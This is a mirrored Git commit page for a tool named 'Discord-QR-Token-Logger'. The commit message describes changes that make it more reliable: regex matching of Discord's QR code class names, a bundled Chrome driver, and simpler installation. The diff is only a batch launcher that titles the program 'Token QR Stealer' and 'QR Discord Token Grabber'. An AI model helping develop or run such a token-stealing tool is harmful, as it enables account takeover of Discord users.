mirror of
https://github.com/9P9/Discord-QR-Token-Logger.git
synced 2025-09-07 09:08:01 +00:00
Revision by the-cult-of-integral
One prevalent issue was that discord regular changes class names for the QR code, thus breaking the program. This issue has been fixed using regular expressions. Another issue was that people were having trouble with chromedriver and chrome binaries. Therefore, in this revision, a compatible chrome driver and chrome binary are included within the program (84.0.4147.85). Also simplified dependencies; now you just have to run that installation bat.
This commit is contained in:
@ -1,4 +1,4 @@
|
||||
@echo off
|
||||
title [313] Token QR Stealer [Made by NightFall and Revised By Luci]
|
||||
python qr_generator.py
|
||||
pause
|
||||
title QR Discord Token Grabber [Developed by NightFall, Revised By Luci and the-cult-of-integral]
|
||||
python QR-dtg.py
|
||||
title Terminal
|
Reference in New Issue
Block a user